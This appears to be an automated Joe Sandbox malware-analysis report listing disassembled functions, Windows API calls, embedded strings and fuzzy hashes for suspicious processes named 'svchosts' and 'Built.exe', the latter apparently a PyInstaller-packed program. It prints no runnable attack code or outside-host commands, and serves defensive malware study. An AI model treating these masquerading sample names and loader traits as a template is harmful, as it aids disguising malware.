Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xj.
API String ID: 665744214-2247023717
Opcode ID: 252831c861e549951a5ff6670c6ccc22ffbfc4305e7a0d6d75a54e127fa23d15
Instruction ID: 28c3a5abc03f80aa6fd3b7637196b0de6527983a766e3da6d69d5b26de58a01b
Opcode Fuzzy Hash: 252831c861e549951a5ff6670c6ccc22ffbfc4305e7a0d6d75a54e127fa23d15
Instruction Fuzzy Hash: 66113B72A30245ABDF22DE34AC05BAB3798B70B750F144079BD46A7191CFB06C64C760

Function 0029EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0029EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0029EB92
Part of subcall function 0029EB73: GetProcAddress.KERNEL32(002D81C0,CryptUnprotectMemory), ref: 0029EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0029EBEC), ref: 0029EC84

Strings

CryptProtectMemory failed, xrefs: 0029EC3B
CryptUnprotectMemory failed, xrefs: 0029EC7C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: fe13aff8f883ba306ad9c0fd1ed2084a730ff3909b41fe8cce3f4098f86cbc63
Instruction ID: 990b156d7b8465fe5395f76ff3c674e1f8c335ea30e22e665b466169f221d4bf
Opcode Fuzzy Hash: fe13aff8f883ba306ad9c0fd1ed2084a730ff3909b41fe8cce3f4098f86cbc63
Instruction Fuzzy Hash: 8A115931A25225AFDF14DF34ED0ABAE7754EF00710B06811BFC856B281CB759E2187D0

Function 002B9B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B9BBE
_free.LIBCMT ref: 002B9BE4

Strings

X,, xrefs: 002B9C4B

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free
String ID: X,
API String ID: 269201875-3991676738
Opcode ID: 9ec0fb201a83e0240826fca9584295b05e3853a83dbbf18aacae0934fffd4ad9
Instruction ID: f149743b2775ab90887b2a024687bce152e4db4d3ac9a2bc9cf3ede1d8766ab6
Opcode Fuzzy Hash: 9ec0fb201a83e0240826fca9584295b05e3853a83dbbf18aacae0934fffd4ad9
Instruction Fuzzy Hash: DE11DA71A2022186EB209F78BC45FA637986B553F4F550226FA25CA2D0E771C8B1C740

Function 002AEC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002AF25E
___raise_securityfailure.LIBCMT ref: 002AF345

Strings

8/, xrefs: 002AF340

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8/
API String ID: 3761405300-3410374190
Opcode ID: 071d3a09f59a06d52706b92e2a779b6de7469ce87f6c8a88dd24ed08a6c2ff78
Instruction ID: 930dd03377efdd3300271165e45a58565effb239cc46fb17ddaddbc12e107a75
Opcode Fuzzy Hash: 071d3a09f59a06d52706b92e2a779b6de7469ce87f6c8a88dd24ed08a6c2ff78
Instruction Fuzzy Hash: 352125B95603048BD754DF54FEC9B207BA4FB4D3A0F60583AE9088B3A2E3B56994CF45

Function 002A0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,002A09D0,?,00000000,00000000), ref: 002A08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 002A08F4

Part of subcall function 00296E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00296EAF

Strings

CreateThread failed, xrefs: 002A08B9

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 03b699b43700db2abc672ec15a58e947a9763d4dca36f67dd57edc67287b230b
Instruction ID: 2aaec29cba78204fd66f557c77c039c354aaeff0fa534878ca9d30a18cc635ed
Opcode Fuzzy Hash: 03b699b43700db2abc672ec15a58e947a9763d4dca36f67dd57edc67287b230b
Instruction Fuzzy Hash: CB01F9B23643066FD630AF54FCCAF6B7398EB42711F20043EF98652180CEA1AC609A64

Function 002BB2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002B8FA5: GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
Part of subcall function 002B8FA5: _free.LIBCMT ref: 002B8FDC
Part of subcall function 002B8FA5: SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
Part of subcall function 002B8FA5: _abort.LIBCMT ref: 002B9023

_abort.LIBCMT ref: 002BB2E0
_free.LIBCMT ref: 002BB314

Strings

,, xrefs: 002BB30B

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: ,
API String ID: 289325740-609127500
Opcode ID: 4d66242b2b8e54bf96da5d5bd92b7fbbdde834e3266dd32dcacda6fa45484949
Instruction ID: 61f5be679fb61a97235071459cd767b12dc95869081eadda54da98e189c0f2e4
Opcode Fuzzy Hash: 4d66242b2b8e54bf96da5d5bd92b7fbbdde834e3266dd32dcacda6fa45484949
Instruction Fuzzy Hash: 42019631D31622DFCB269F59980169DB3B8BF047A1B1A014AE86567681CBB06D62CFC1

Function 0029130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0029DA98: _swprintf.LIBCMT ref: 0029DABE
Part of subcall function 0029DA98: _strlen.LIBCMT ref: 0029DADF
Part of subcall function 0029DA98: SetDlgItemTextW.USER32(?,002CE154,?), ref: 0029DB3F
Part of subcall function 0029DA98: GetWindowRect.USER32(?,?), ref: 0029DB79
Part of subcall function 0029DA98: GetClientRect.USER32(?,?), ref: 0029DB85

GetDlgItem.USER32(00000000,00003021), ref: 0029134F
SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

Strings

0, xrefs: 0029130E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 8d42f73391149a5fa6ef89ead2f7ef1c5b31498108e99ca9a141ad4017287df8
Instruction ID: 51a9b777e7f85dc32657d4a7cd60c1047ff30d2a4eebe775069f1fea8da81675
Opcode Fuzzy Hash: 8d42f73391149a5fa6ef89ead2f7ef1c5b31498108e99ca9a141ad4017287df8
Instruction Fuzzy Hash: 09F08C3013024EA6DF254F62980DBFA3BA8BF25395F088494BD49546A1C774C9B5EA18

Function 002A084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,002A0A78,?), ref: 002A0854
GetLastError.KERNEL32(?), ref: 002A0860

Part of subcall function 00296E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00296EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002A0869

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d9684fa72b3220be6519696e4732b08f33b261d1236ab04e379fbcac5c4a2c11
Instruction ID: 51f9b80008dcd36816823411f7d63b8b71f46b9703bc754a70d6ee38974f36f1
Opcode Fuzzy Hash: d9684fa72b3220be6519696e4732b08f33b261d1236ab04e379fbcac5c4a2c11
Instruction Fuzzy Hash: 41D05E329280212BCA107724EC0EEAF79559F52770F204B19F679652F5DE210D7186DA

Function 0029DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0029D32F,?), ref: 0029DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0029D32F,?), ref: 0029DA61

Strings

RTL, xrefs: 0029DA5B

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: d49e24e3bbf4c139f99e2112f31adc2b9062dbb1785c7b8bcbc9c80233404362
Instruction ID: cb987467064318c5c9a918bc3da0de57c1a4ba245b55d7846f30e01d33d0a673
Opcode Fuzzy Hash: d49e24e3bbf4c139f99e2112f31adc2b9062dbb1785c7b8bcbc9c80233404362
Instruction Fuzzy Hash: 54C01232299350B6EB30AB207C0DF832A486F11B12F09484CB245DA2D0DAE5CA5086A1

Analysis Process: Built.exePID: 6252, Parent PID: 6496COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	624
Total number of Limit Nodes:	15

Executed Functions

Function 00007FF76D5C1000 Relevance: 42.3, APIs: 5, Strings: 19, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_MEIPASS2, xrefs: 00007FF76D5C36A2, 00007FF76D5C36AE, 00007FF76D5C39AC
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF76D5C3A12
Failed to convert DLL search path!, xrefs: 00007FF76D5C38A3
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF76D5C391A
pyi-disable-windowed-traceback, xrefs: 00007FF76D5C361D
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF76D5C3905
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF76D5C3820
Failed to start splash screen!, xrefs: 00007FF76D5C3933
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF76D5C3653
pkg, xrefs: 00007FF76D5C37CF
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF76D5C37EF
[oV116, xrefs: 00007FF76D5C3502
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF76D5C378C
Could not create temporary directory!, xrefs: 00007FF76D5C3838
pyi-contents-directory, xrefs: 00007FF76D5C35F8
MEI, xrefs: 00007FF76D5C374E
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF76D5C36FC
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF76D5C3A31
bye-runtime-tmpdir, xrefs: 00007FF76D5C35D3

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$[oV116$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
API String ID: 514040917-3585573875
Opcode ID: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
Instruction ID: c99c8860e0fdac09ed77b146a73fd7f673d5fddab605377982c504a4ebb6e327
Opcode Fuzzy Hash: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
Instruction Fuzzy Hash: 96F15921A2C786D1FB19FB21D5542B9A2A1AF58780FC4403ADE1D43A97FF2CE558CB70

Function 00007FF76D5E5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E59E9
Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5A67
Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5AB8

CreateFileW.KERNEL32 ref: 00007FF76D5E5D7A
CreateFileW.KERNEL32 ref: 00007FF76D5E5DCA
GetLastError.KERNEL32 ref: 00007FF76D5E5DFA
GetFileType.KERNEL32 ref: 00007FF76D5E5E0F
GetLastError.KERNEL32 ref: 00007FF76D5E5E19
CloseHandle.KERNEL32 ref: 00007FF76D5E5E4C
CloseHandle.KERNEL32 ref: 00007FF76D5E5FAF
CreateFileW.KERNEL32 ref: 00007FF76D5E5FE4
GetLastError.KERNEL32 ref: 00007FF76D5E5FF3

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: f4dcd9222a0f64b4a608c99ab80cf2d788be897eb611c508f1a7bb86715073c0
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 94C1C336B28A45C6EB10EF68C4902BC7761FB49B98B811235DF2E57B96EF38D551C320

Function 00007FFDFB8998A0 Relevance: 6.9, APIs: 4, Instructions: 893COMMON

Download Yara Rule

APIs

00007FFE216804F0.KERNEL32 ref: 00007FFDFB89A3B5
00007FFE2167AEC0.KERNEL32 ref: 00007FFDFB89A3DF
00007FFE2167BC70.KERNEL32(?,?,?,00000000), ref: 00007FFDFB89A469
00007FFE2167BC70.KERNEL32 ref: 00007FFDFB89A487

Memory Dump Source

Source File: 00000003.00000002.2067671148.00007FFDFB899000.00000080.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB2C0000, based on PE: true

Associated: 00000003.00000002.2066264904.00007FFDFB2C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB2C1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB55A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB5D4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB616000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB6D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB6D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB7DF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB820000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB82A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB84E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2066532868.00007FFDFB88D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2067734508.00007FFDFB89B000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdfb2c0000_Built.jbxd

Similarity

API ID: 00007$E2167$E216804
String ID:
API String ID: 4134553183-0
Opcode ID: fdb599fc99c8fad1dcd8d64366f4a8b9e772c8d2446d19b2fbc340804334e0c3
Instruction ID: 25a286fbb67e989261d88c2a520b4dba501d5c9c9622d21570e5b709a78e0f6a
Opcode Fuzzy Hash: fdb599fc99c8fad1dcd8d64366f4a8b9e772c8d2446d19b2fbc340804334e0c3
Instruction Fuzzy Hash: C762162273919786EB158F38D45067D7B90F798B89F045132EAAEC37D8EA7CEA45C700

Function 00007FF76D5C85A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF76D5C85D3
FindClose.KERNEL32 ref: 00007FF76D5C85E2

Strings

[oV116, xrefs: 00007FF76D5C85A9

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: [oV116
API String ID: 2295610775-247592185
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: ec88b6fe75d1f8700bdab4c2eca9bc2c93fb35243e69a3d215c5a16718a7ef72
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 33F0A422A2C741C6F760AF60B488366B350AB44328F840239DD7E02AD5EF3CD058CE14

Function 00007FFE1024A078 Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFDFB434214.PYTHON311 ref: 00007FFE1024A09A

Part of subcall function 00007FFE1024C034: 00007FFE1FB1B9F0.CRYPT32 ref: 00007FFE1024C060

Memory Dump Source

Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true

Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd

Similarity

API ID: 00007$B434214
String ID:
API String ID: 2120276872-0
Opcode ID: 5512a1eabacbca0d3b8ad089bd680032222cc6725cd5df72e4646ec3e0e7399c
Instruction ID: 965d583e67f91c462ab9306704d5d33dd9989bab24a7ec27c0c7aef918639511
Opcode Fuzzy Hash: 5512a1eabacbca0d3b8ad089bd680032222cc6725cd5df72e4646ec3e0e7399c
Instruction Fuzzy Hash: 83611F31E0DE12C2EA55AF6399541396AA0BFD5BB0F0944B4DF0E877B2DE7DA405D340

Function 00007FF76D5C18F0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5C76A0: _fread_nolock.LIBCMT ref: 00007FF76D5C774A

_fread_nolock.LIBCMT ref: 00007FF76D5C19B4

Part of subcall function 00007FF76D5C2760: MessageBoxW.USER32 ref: 00007FF76D5C283B

Strings

fread, xrefs: 00007FF76D5C19C6, 00007FF76D5C1ADB
Could not allocate buffer for TOC!, xrefs: 00007FF76D5C1AA1
calloc, xrefs: 00007FF76D5C19F5
malloc, xrefs: 00007FF76D5C1AA8
Could not allocate memory for archive structure!, xrefs: 00007FF76D5C19EE
Failed to read cookie!, xrefs: 00007FF76D5C19BF
Failed to seek to cookie position!, xrefs: 00007FF76D5C1989
[oV116, xrefs: 00007FF76D5C1902
fseek, xrefs: 00007FF76D5C1990
MEI, xrefs: 00007FF76D5C1931
Could not read full TOC!, xrefs: 00007FF76D5C1AD4
Error on file., xrefs: 00007FF76D5C1B0A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _fread_nolock$Message
